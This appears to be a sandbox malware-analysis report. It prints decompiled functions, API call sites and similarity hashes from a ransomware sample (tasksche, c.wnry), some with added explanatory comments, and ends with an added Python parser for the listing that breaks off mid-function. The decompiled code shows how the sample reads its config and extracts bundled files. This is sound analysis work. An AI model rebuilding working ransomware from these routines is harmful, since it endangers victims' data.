                                                                                APIs
                                                                                • fopen.MSVCRT(c.wnry,0040E018), ref: 0040101B
                                                                                • fread.MSVCRT(?,0000030C,00000001,00000000), ref: 0040103F
                                                                                • fwrite.MSVCRT(?,0000030C,00000001,00000000), ref: 00401047
                                                                                • fclose.MSVCRT(00000000), ref: 00401058
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.353543995.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000001D.00000002.353442823.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353650721.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353692061.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_400000_tasksche.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: fclosefopenfreadfwrite
                                                                                • String ID: c.wnry
                                                                                • API String ID: 4000964834-3240288721
                                                                                • Opcode ID: 83356dae967f3845aa64eafaf8b7e6f79fd4dc7784855bee587f11601882f661
                                                                                • Instruction ID: 4fc4ee2583eead98f325da0eb4a8e2a7a7827d82b7f69226d67b1691b23a23d5
                                                                                • Opcode Fuzzy Hash: 83356dae967f3845aa64eafaf8b7e6f79fd4dc7784855bee587f11601882f661
                                                                                • Instruction Fuzzy Hash: 0CF05931204260ABCA301F656D4AA277B10DBC4F61F10083FF1C1F40E2CABD44C296BE
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 24%
                                                                                			E004018F9(intOrPtr _a4, intOrPtr _a8, CHAR* _a12) {
                                                                                				struct _OVERLAPPED* _v8;
                                                                                				char _v20;
                                                                                				long _v32;
                                                                                				struct _OVERLAPPED* _v36;
                                                                                				long _v40;
                                                                                				signed int _v44;
                                                                                				void* _t18;
                                                                                				void* _t28;
                                                                                				long _t34;
                                                                                				intOrPtr _t38;
                                                                                
                                                                                				_push(0xffffffff);
                                                                                				_push(0x4081f0);
                                                                                				_push(0x4076f4);
                                                                                				_push( *[fs:0x0]);
                                                                                				 *[fs:0x0] = _t38;
                                                                                				_v44 = _v44 | 0xffffffff;
                                                                                				_v32 = 0;
                                                                                				_v36 = 0;
                                                                                				_v8 = 0;
                                                                                				_t18 = CreateFileA(_a12, 0x80000000, 1, 0, 3, 0, 0);
                                                                                				_v44 = _t18;
                                                                                				if(_t18 != 0xffffffff) {
                                                                                					_t34 = GetFileSize(_t18, 0);
                                                                                					_v40 = _t34;
                                                                                					if(_t34 != 0xffffffff && _t34 <= 0x19000) {
                                                                                						_t28 = GlobalAlloc(0, _t34);
                                                                                						_v36 = _t28;
                                                                                						if(_t28 != 0 && ReadFile(_v44, _t28, _t34,  &_v32, 0) != 0) {
                                                                                							_push(_a8);
                                                                                							_push(0);
                                                                                							_push(0);
                                                                                							_push(_v32);
                                                                                							_push(_t28);
                                                                                							_push(_a4);
                                                                                							if( *0x40f898() != 0) {
                                                                                								_push(1);
                                                                                								_pop(0);
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				_push(0xffffffff);
                                                                                				_push( &_v20);
                                                                                				L004076FA();
                                                                                				 *[fs:0x0] = _v20;
                                                                                				return 0;
                                                                                			}
                                                                                0x004018fc
                                                                                0x004018fe
                                                                                0x00401903
                                                                                0x0040190e
                                                                                0x0040190f
                                                                                0x0040191c
                                                                                0x00401922
                                                                                0x00401925
                                                                                0x00401928
                                                                                0x0040193a
                                                                                0x00401940
                                                                                0x00401946
                                                                                0x00401950
                                                                                0x00401952
                                                                                0x00401958
                                                                                0x0040196a
                                                                                0x0040196c
                                                                                0x00401971
                                                                                0x00401987
                                                                                0x0040198a
                                                                                0x0040198b
                                                                                0x0040198c
                                                                                0x0040198f
                                                                                0x00401990
                                                                                0x0040199b
                                                                                0x0040199d
                                                                                0x0040199f
                                                                                0x0040199f
                                                                                0x0040199b
                                                                                0x00401971
                                                                                0x00401958
                                                                                0x004019a0
                                                                                0x004019a5
                                                                                0x004019a6
                                                                                0x004019d5
                                                                                0x004019e0

                                                                                APIs
                                                                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,00401448,?), ref: 0040193A
                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,00401448,?), ref: 0040194A
                                                                                • GlobalAlloc.KERNEL32(00000000,00000000,?,?,?,?,?,?,00401448,?), ref: 00401964
                                                                                • ReadFile.KERNEL32(000000FF,00000000,00000000,?,00000000,?,?,?,?,?,?,00401448,?), ref: 0040197D
                                                                                • _local_unwind2.MSVCRT(?,000000FF,?,?,?,?,?,?,00401448,?), ref: 004019A6
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.353543995.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000001D.00000002.353442823.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353650721.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353692061.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_400000_tasksche.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$AllocCreateGlobalReadSize_local_unwind2
                                                                                • String ID:
                                                                                • API String ID: 2811923685-0
                                                                                • Opcode ID: 232dc3714e51fefb2f6fb0f5b065eea7eb2b0009f41f45388587d49ab84ddf28
                                                                                • Instruction ID: fb063a64e2dc49fc25d010f75d45645ced701e765f932c996de96a45c5b9f027
                                                                                • Opcode Fuzzy Hash: 232dc3714e51fefb2f6fb0f5b065eea7eb2b0009f41f45388587d49ab84ddf28
                                                                                • Instruction Fuzzy Hash: B62160B1901624AFCB209B99CD48FDF7E78EB097B0F54022AF525B22E0D7785805C6AC
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 97%
                                                                                			E00405BAE(CHAR* _a4, intOrPtr _a8, long _a12, void* _a16) {
                                                                                				char _v5;
                                                                                				char _v6;
                                                                                				long _t30;
                                                                                				char _t32;
                                                                                				long _t34;
                                                                                				void* _t46;
                                                                                				intOrPtr* _t49;
                                                                                				long _t50;
                                                                                
                                                                                				_t30 = _a12;
                                                                                				if(_t30 == 1 || _t30 == 2 || _t30 == 3) {
                                                                                					_t49 = _a16;
                                                                                					_t46 = 0;
                                                                                					_v6 = 0;
                                                                                					 *_t49 = 0;
                                                                                					_v5 = 0;
                                                                                					if(_t30 == 1) {
                                                                                						_t46 = _a4;
                                                                                						_v5 = 0;
                                                                                						L11:
                                                                                						_t30 = SetFilePointer(_t46, 0, 0, 1);
                                                                                						_v6 = _t30 != 0xffffffff;
                                                                                						L12:
                                                                                						_push(0x20);
                                                                                						L00407700();
                                                                                						_t50 = _t30;
                                                                                						if(_a12 == 1 || _a12 == 2) {
                                                                                							 *_t50 = 1;
                                                                                							 *((char*)(_t50 + 0x10)) = _v5;
                                                                                							_t32 = _v6;
                                                                                							 *((char*)(_t50 + 1)) = _t32;
                                                                                							 *(_t50 + 4) = _t46;
                                                                                							 *((char*)(_t50 + 8)) = 0;
                                                                                							 *((intOrPtr*)(_t50 + 0xc)) = 0;
                                                                                							if(_t32 != 0) {
                                                                                								 *((intOrPtr*)(_t50 + 0xc)) = SetFilePointer(_t46, 0, 0, 1);
                                                                                							}
                                                                                						} else {
                                                                                							 *_t50 = 0;
                                                                                							 *((intOrPtr*)(_t50 + 0x14)) = _a4;
                                                                                							 *((char*)(_t50 + 1)) = 1;
                                                                                							 *((char*)(_t50 + 0x10)) = 0;
                                                                                							 *((intOrPtr*)(_t50 + 0x18)) = _a8;
                                                                                							 *((intOrPtr*)(_t50 + 0x1c)) = 0;
                                                                                							 *((intOrPtr*)(_t50 + 0xc)) = 0;
                                                                                						}
                                                                                						 *_a16 = 0;
                                                                                						_t34 = _t50;
                                                                                						goto L18;
                                                                                					}
                                                                                					if(_t30 != 2) {
                                                                                						goto L12;
                                                                                					}
                                                                                					_t46 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0x80, 0);
                                                                                					if(_t46 != 0xffffffff) {
                                                                                						_v5 = 1;
                                                                                						goto L11;
                                                                                					}
                                                                                					 *_t49 = 0x200;
                                                                                					goto L8;
                                                                                				} else {
                                                                                					 *_a16 = 0x10000;
                                                                                					L8:
                                                                                					_t34 = 0;
                                                                                					L18:
                                                                                					return _t34;
                                                                                				}
                                                                                			}

                                                                                APIs
                                                                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00000000,00000140,?,00406C12,00000000,00401DFE,00000001), ref: 00405BFE
                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,00000000,00000000,00000140,?,00406C12,00000000,00401DFE,00000001,00000000,004074EA,00000000), ref: 00405C29
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000020,?,?,00000000,00000000,00000140,?,00406C12,00000000,00401DFE,00000001,00000000,004074EA,00000000,004020D5,?), ref: 00405C38
                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,?,00000000,00000000,00000140,?,00406C12,00000000,00401DFE,00000001,00000000,004074EA), ref: 00405C8A
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.353543995.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000001D.00000002.353442823.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353650721.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353692061.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_400000_tasksche.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$Pointer$??2@Create
                                                                                • String ID:
                                                                                • API String ID: 1331958074-0
                                                                                • Opcode ID: ff1e72f22e15843ade9ace39703012fff21b8a1e8b9c48cc3c9963cb15211f94
                                                                                • Instruction ID: 771dcc1d5a31089dd4cc2aab62cbbe5a226dda330bf0289da8f54b52fc8588cb
                                                                                • Opcode Fuzzy Hash: ff1e72f22e15843ade9ace39703012fff21b8a1e8b9c48cc3c9963cb15211f94
                                                                                • Instruction Fuzzy Hash: 0831F231008784AFDB318F28888479BBBF4EF15350F18896EF491A7380C375AD85CB69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 37%
                                                                                			E00402924(intOrPtr* _a4, char _a8) {
                                                                                				intOrPtr _v8;
                                                                                				intOrPtr* _t26;
                                                                                				intOrPtr* _t28;
                                                                                				void* _t29;
                                                                                				intOrPtr _t30;
                                                                                				void* _t32;
                                                                                				signed int _t33;
                                                                                				signed int _t37;
                                                                                				signed short* _t41;
                                                                                				intOrPtr _t44;
                                                                                				intOrPtr _t49;
                                                                                				intOrPtr* _t55;
                                                                                				intOrPtr _t58;
                                                                                				void* _t59;
                                                                                
                                                                                				_t26 = _a4;
                                                                                				_t44 =  *((intOrPtr*)(_t26 + 4));
                                                                                				_t28 =  *_t26 + 0x78;
                                                                                				_v8 = _t44;
                                                                                				if( *((intOrPtr*)(_t28 + 4)) == 0) {
                                                                                					L11:
                                                                                					SetLastError(0x7f);
                                                                                					_t29 = 0;
                                                                                				} else {
                                                                                					_t58 =  *_t28;
                                                                                					_t30 =  *((intOrPtr*)(_t58 + _t44 + 0x18));
                                                                                					_t59 = _t58 + _t44;
                                                                                					if(_t30 == 0 ||  *((intOrPtr*)(_t59 + 0x14)) == 0) {
                                                                                						goto L11;
                                                                                					} else {
                                                                                						_t8 =  &_a8; // 0x402150
                                                                                						if( *_t8 >> 0x10 != 0) {
                                                                                							_t55 =  *((intOrPtr*)(_t59 + 0x20)) + _t44;
                                                                                							_t41 =  *((intOrPtr*)(_t59 + 0x24)) + _t44;
                                                                                							_a4 = 0;
                                                                                							if(_t30 <= 0) {
                                                                                								goto L11;
                                                                                							} else {
                                                                                								while(1) {
                                                                                									_t32 =  *_t55 + _t44;
                                                                                									_t15 =  &_a8; // 0x402150
                                                                                									__imp___stricmp( *_t15, _t32);
                                                                                									if(_t32 == 0) {
                                                                                										break;
                                                                                									}
                                                                                									_a4 = _a4 + 1;
                                                                                									_t55 = _t55 + 4;
                                                                                									_t41 =  &(_t41[1]);
                                                                                									if(_a4 <  *((intOrPtr*)(_t59 + 0x18))) {
                                                                                										_t44 = _v8;
                                                                                										continue;
                                                                                									} else {
                                                                                										goto L11;
                                                                                									}
                                                                                									goto L12;
                                                                                								}
                                                                                								_t33 =  *_t41 & 0x0000ffff;
                                                                                								_t44 = _v8;
                                                                                								goto L14;
                                                                                							}
                                                                                						} else {
                                                                                							_t9 =  &_a8; // 0x402150
                                                                                							_t37 =  *_t9 & 0x0000ffff;
                                                                                							_t49 =  *((intOrPtr*)(_t59 + 0x10));
                                                                                							if(_t37 < _t49) {
                                                                                								goto L11;
                                                                                							} else {
                                                                                								_t33 = _t37 - _t49;
                                                                                								L14:
                                                                                								if(_t33 >  *((intOrPtr*)(_t59 + 0x14))) {
                                                                                									goto L11;
                                                                                								} else {
                                                                                									_t29 =  *((intOrPtr*)( *((intOrPtr*)(_t59 + 0x1c)) + _t33 * 4 + _t44)) + _t44;
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				L12:
                                                                                				return _t29;
                                                                                			}

                                                                                APIs
                                                                                • _stricmp.MSVCRT(P!@,?,?,0000DDB6,?,?,?,00402150,00000000,TaskStart), ref: 00402989
                                                                                • SetLastError.KERNEL32(0000007F,?,0000DDB6,?,?,?,00402150,00000000,TaskStart), ref: 004029A7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.353543995.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001D.00000002.353442823.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000001D.00000002.353650721.0000000000408000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmp
• Associated: 0000001D.00000002.353692061.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_400000_tasksche.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast_stricmp
                                                                                • String ID: P!@
                                                                                • API String ID: 1278613211-1774101457
                                                                                • Opcode ID: 03c3627be8870cecb91afdd38bef801573c0f783d9791e09bb9b18ce57a97af9
                                                                                • Instruction ID: aaf1e2d36ba78ebe43aa6e6aad127835d86855a49192f4e92224227a9dbc2408
                                                                                • Opcode Fuzzy Hash: 03c3627be8870cecb91afdd38bef801573c0f783d9791e09bb9b18ce57a97af9
                                                                                • Instruction Fuzzy Hash: 432180B1700605EFDB14CF19DA8486A73F6EF89310B29857AE846EB381D678ED41CB85
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 89%
			/* Reading of the body below (inferred from the code as decompiled; the E004xxxxx helpers
			   are unresolved in this listing): __eax is an archive handle. E004075C4(h, -1, &n) fills n
			   with the entry count and E004075C4(h, i, buf) fills buf with the name of entry i. Every
			   entry is passed to E0040763D (extraction) unless it is named "c.wnry" AND that file already
			   exists on disk, so an existing c.wnry is never overwritten. E00407656(h) is the final cleanup
			   call. _t38 is the frame pointer the decompiler leaves unassigned; _t38 - 0x128 is a 0x128-byte
			   name buffer and _t38 - 0x12c the entry counter. */
			E00401DFE(void* __eax) {
				int _t21;
				signed int _t27;
				signed int _t29;
				void* _t34;
				void* _t36;
				void* _t38;
				void* _t40;
				void* _t41;
				void* _t43;

				_t36 = __eax;
				_t41 = _t40 + 0xc;
				if(__eax != 0) {
					 *(_t38 - 0x12c) =  *(_t38 - 0x12c) & 0x00000000;   /* entry count = 0 */
					_t29 = 0x4a;
					memset(_t38 - 0x128, 0, _t29 << 2);                 /* zero the 0x128-byte name buffer */
					E004075C4(_t36, 0xffffffff, _t38 - 0x12c);          /* index -1: query entry count */
					_t27 =  *(_t38 - 0x12c);
					_t43 = _t41 + 0x18;
					_t34 = 0;
					if(_t27 > 0) {
						do {
							E004075C4(_t36, _t34, _t38 - 0x12c);          /* name of entry _t34 into the buffer */
							_t21 = strcmp(_t38 - 0x128, "c.wnry");
							_t43 = _t43 + 0x14;
							/* 0xffffffff is INVALID_FILE_ATTRIBUTES: the file is not present on disk */
							if(_t21 != 0 || GetFileAttributesA(_t38 - 0x128) == 0xffffffff) {
								E0040763D(_t36, _t34, _t38 - 0x128);        /* extract entry _t34 */
								_t43 = _t43 + 0xc;
							}
							_t34 = _t34 + 1;
						} while (_t34 < _t27);
					}
					E00407656(_t36);
					_push(1);
					_pop(0);
				} else {
				}
				return 0;
			}

Statement addresses (one per decompiled line, in listing order): 0x00401dfe, 0x00401e00, 0x00401e05, 0x00401e0e, 0x00401e1a, 0x00401e21, 0x00401e2d, 0x00401e32, 0x00401e38, 0x00401e3b, 0x00401e3f, 0x00401e41, 0x00401e4a, 0x00401e5b, 0x00401e60, 0x00401e65, 0x00401e82, 0x00401e87, 0x00401e87, 0x00401e8a, 0x00401e8b, 0x00401e41, 0x00401e90, 0x00401e96, 0x00401e98, 0x00401e07, 0x00401e07, 0x00401e9d

                                                                                APIs
                                                                                • strcmp.MSVCRT(?,c.wnry,?,00000000,?), ref: 00401E5B
                                                                                • GetFileAttributesA.KERNEL32(?), ref: 00401E6E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.353543995.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001D.00000002.353442823.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000001D.00000002.353650721.0000000000408000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmp
• Associated: 0000001D.00000002.353692061.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_400000_tasksche.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AttributesFilestrcmp
                                                                                • String ID: c.wnry
                                                                                • API String ID: 3324900478-3240288721
                                                                                • Opcode ID: cc95b26050e750b8ddedfaa82b6fbbed5bde767aecf08ad1744914d0cf1c8067
                                                                                • Instruction ID: 6f95607eaad4b3b0c5796a2914108af7bfa48759f01996e65d2c9759274caab0
                                                                                • Opcode Fuzzy Hash: cc95b26050e750b8ddedfaa82b6fbbed5bde767aecf08ad1744914d0cf1c8067
                                                                                • Instruction Fuzzy Hash: 3001C872D041142ADB209625DC41FEF336C9B45374F1005B7FA44F11C1E739AA998ADA
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 84%
			/* Object destructor: if the flag byte at +0x10 is set, the handle stored at +4 is closed,
			   then the object is freed through L004076E8 (the MSVCRT operator delete, ??3@YAXPAX@Z,
			   per the APIs list below). A NULL object returns -1. */
			E00405C9F(signed int __eax, intOrPtr _a4) {
				intOrPtr _t9;

				_t9 = _a4;
				if(_t9 != 0) {
					if( *((char*)(_t9 + 0x10)) != 0) {
						CloseHandle( *(_t9 + 4));     /* only when the object owns the handle */
					}
					_push(_t9);
					L004076E8();                      /* operator delete(_t9) */
					return 0;
				} else {
					return __eax | 0xffffffff;        /* -1 */
				}
			}

Statement addresses (one per decompiled line, in listing order): 0x00405ca0, 0x00405ca6, 0x00405cb1, 0x00405cb6, 0x00405cb6, 0x00405cbc, 0x00405cbd, 0x00405cc6, 0x00405ca8, 0x00405cac, 0x00405cac

                                                                                APIs
                                                                                • CloseHandle.KERNEL32(?,$l@,00406118,$l@,?,00000000,00000000), ref: 00405CB6
                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,$l@,00406118,$l@,?,00000000,00000000), ref: 00405CBD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.353543995.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001D.00000002.353442823.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000001D.00000002.353650721.0000000000408000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmp
• Associated: 0000001D.00000002.353692061.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_400000_tasksche.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ??3@CloseHandle
                                                                                • String ID: $l@
                                                                                • API String ID: 3816424416-2140230165
                                                                                • Opcode ID: 95d67fc171dea6c803f2538cd8e9bf2129e8d776d8110548eb6437a9e23f5d7b
                                                                                • Instruction ID: 673c02d0cae411eac5e44946f87937de45fd09569792d44698d585129e0307c2
                                                                                • Opcode Fuzzy Hash: 95d67fc171dea6c803f2538cd8e9bf2129e8d776d8110548eb6437a9e23f5d7b
                                                                                • Instruction Fuzzy Hash: 47D05E3280DE211BE7226A28B90469B2B949F01330F054A6EE4A1A25E2D7789C8596CC
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 25%
			/* Under the object's critical section (at __ecx + 0x10), calls the function pointer stored
			   at 0x40f8a4 (the import is not resolved in this listing) with the handle at __ecx + 8 and
			   the arguments (0, 1, 0, _a4, &_a8). On success the _a8 bytes the callee wrote to _a4 are
			   copied to the caller's buffer _a12 and the length is stored in *_a16; the copy length is
			   whatever the callee returned in _a8, not a caller-supplied capacity. Returns 1 on success,
			   0 if the handle is NULL or the call fails. */
			E004019E1(void* __ecx, void* _a4, int _a8, void* _a12, int* _a16) {
				void* _t13;
				void* _t16;
				struct _CRITICAL_SECTION* _t19;
				void* _t20;

				_t20 = __ecx;
				if( *((intOrPtr*)(__ecx + 8)) == 0) {
					L3:
					return 0;
				}
				_t19 = __ecx + 0x10;
				EnterCriticalSection(_t19);
				_t13 =  *0x40f8a4( *((intOrPtr*)(_t20 + 8)), 0, 1, 0, _a4,  &_a8);   /* indirect call, _a8 in/out */
				_push(_t19);
				if(_t13 != 0) {
					LeaveCriticalSection();
					memcpy(_a12, _a4, _a8);             /* length taken from the callee's _a8 */
					 *_a16 = _a8;
					_t16 = 1;
					return _t16;
				}
				LeaveCriticalSection();
				goto L3;
			}

Statement addresses (one per decompiled line, in listing order): 0x004019e5, 0x004019ec, 0x00401a19, 0x00000000, 0x00401a19, 0x004019ee, 0x004019f2, 0x00401a08, 0x00401a10, 0x00401a11, 0x00401a1d, 0x00401a2c, 0x00401a3a, 0x00401a3e, 0x00000000, 0x00401a3e, 0x00401a13, 0x00000000

                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(?,00000000,?,?,00401642,?,?,?,?), ref: 004019F2
                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,00401642,?,?,?,?), ref: 00401A13
                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,00401642,?,?,?,?), ref: 00401A1D
                                                                                • memcpy.MSVCRT(?,?,?,?,?,00401642,?,?,?,?), ref: 00401A2C
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.353543995.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001D.00000002.353442823.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000001D.00000002.353650721.0000000000408000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmp
• Associated: 0000001D.00000002.353692061.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_400000_tasksche.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$Leave$Entermemcpy
                                                                                • String ID:
                                                                                • API String ID: 3435569088-0
                                                                                • Opcode ID: fd5125ef58b43d2b94afe930c36afa05085028d191ff952fa05313044055aa85
                                                                                • Instruction ID: 582611ac2dab466912340a9d1f37a03f8b1d3421f3d1388c7c0078807ea36f1a
                                                                                • Opcode Fuzzy Hash: fd5125ef58b43d2b94afe930c36afa05085028d191ff952fa05313044055aa85
                                                                                • Instruction Fuzzy Hash: 7FF0A432200204FFEB119F90DD05FAA3769EF44710F008439F945AA1A0D7B5A854DB65
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%
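Each function block above repeats the same layout (a "C-Code - Quality" header, the decompiled body, an APIs list with call-site addresses, and the Similarity identifiers such as API ID, API String ID and the fuzzy hashes). When a report has hundreds of these blocks, an analyst normally wants them as structured records so that, for example, every function calling memcpy or every Instruction Fuzzy Hash can be pulled out for comparison with other samples. The parser below is an added example written for this page; it is not Joe Sandbox code, and the block layout it expects is assumed from the blocks shown here. The SAMPLE input is constructed from two of the blocks above with the C bodies elided.

```python
"""Parse the per-function blocks of a Joe Sandbox disassembly listing.

Added example for this report page; it is not Joe Sandbox code. The input
format is assumed from the blocks shown on this page: a "C-Code - Quality: N%"
header, the decompiled function whose first line names it (E + 8 hex digits),
an "APIs" list of "name.MODULE(args), ref: ADDR" bullets, a "Similarity" list
of "Key: value" bullets and a "Uniqueness Score: N%" line.
"""
import re
from collections import Counter
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample: two of the blocks above, with the C bodies elided.
SAMPLE = """\
C-Code - Quality: 84%
    E00405C9F(signed int __eax, intOrPtr _a4) {
        ...
    }
APIs
• CloseHandle.KERNEL32(?,$l@,00406118,$l@,?,00000000,00000000), ref: 00405CB6
• ??3@YAXPAX@Z.MSVCRT(00000000,$l@,00406118,$l@,?,00000000,00000000), ref: 00405CBD
Strings
Memory Dump Source
• Source File: 0000001D.00000002.353543995.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ??3@CloseHandle
• String ID: $l@
• API String ID: 3816424416-2140230165
• Opcode ID: 95d67fc171dea6c803f2538cd8e9bf2129e8d776d8110548eb6437a9e23f5d7b
• Instruction ID: 673c02d0cae411eac5e44946f87937de45fd09569792d44698d585129e0307c2
• Instruction Fuzzy Hash: 47D05E3280DE211BE7226A28B90469B2B949F01330F054A6EE4A1A25E2D7789C8596CC
Uniqueness

Uniqueness Score: -1.00%
C-Code - Quality: 25%
    E004019E1(void* __ecx, void* _a4, int _a8, void* _a12, int* _a16) {
        ...
    }
APIs
• EnterCriticalSection.KERNEL32(?,00000000,?,?,00401642,?,?,?,?), ref: 004019F2
• LeaveCriticalSection.KERNEL32(?,?,?,00401642,?,?,?,?), ref: 00401A13
• LeaveCriticalSection.KERNEL32(?,?,?,00401642,?,?,?,?), ref: 00401A1D
• memcpy.MSVCRT(?,?,?,?,?,00401642,?,?,?,?), ref: 00401A2C
Similarity
• API ID: CriticalSection$Leave$Entermemcpy
• String ID:
• API String ID: 3435569088-0
• Instruction Fuzzy Hash: 7FF0A432200204FFEB119F90DD05FAA3769EF44710F008439F945AA1A0D7B5A854DB65
Uniqueness

Uniqueness Score: -1.00%
"""


@dataclass
class ApiCall:
    name: str      # imported function, e.g. CloseHandle or ??3@YAXPAX@Z
    module: str    # module the listing attributes it to, e.g. KERNEL32
    args: str      # argument column as printed ('?' = unknown at analysis time)
    ref: int       # address of the call site, from "ref: XXXXXXXX"


@dataclass
class FunctionRecord:
    name: str
    quality: int                                   # decompiler "Quality" percentage
    apis: List[ApiCall] = field(default_factory=list)
    similarity: Dict[str, str] = field(default_factory=dict)
    uniqueness: Optional[float] = None


HEADER_RE = re.compile(r"^C-Code - Quality: (\d+)%$")
FUNC_RE = re.compile(r"^\s*(E[0-9A-Fa-f]{8})\(")
API_RE = re.compile(r"^\s*[•*-]?\s*(.+?)\.([A-Z0-9_]+)\((.*)\), ref: ([0-9A-Fa-f]+)\s*$")
KV_RE = re.compile(r"^\s*[•*-]?\s*([A-Za-z ]+?):\s*(.*?)\s*$")
UNIQ_RE = re.compile(r"^Uniqueness Score:\s*(-?[0-9.]+)%$")
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin",
            "Yara matches", "Similarity", "Uniqueness"}


def parse_listing(text: str) -> List[FunctionRecord]:
    """Split the listing into one FunctionRecord per 'C-Code - Quality' block."""
    records: List[FunctionRecord] = []
    current: Optional[FunctionRecord] = None
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        m = HEADER_RE.match(line)
        if m:                                      # new block starts at the quality header
            current = FunctionRecord(name="", quality=int(m.group(1)))
            records.append(current)
            section = "code"
            continue
        if current is None:
            continue
        if line in SECTIONS:                       # bare section titles switch the parser state
            section = line
            continue
        if section == "code" and not current.name:
            fm = FUNC_RE.match(raw)                # first code line carries the function name
            if fm:
                current.name = fm.group(1)
            continue
        if section == "APIs":
            am = API_RE.match(raw)
            if am:
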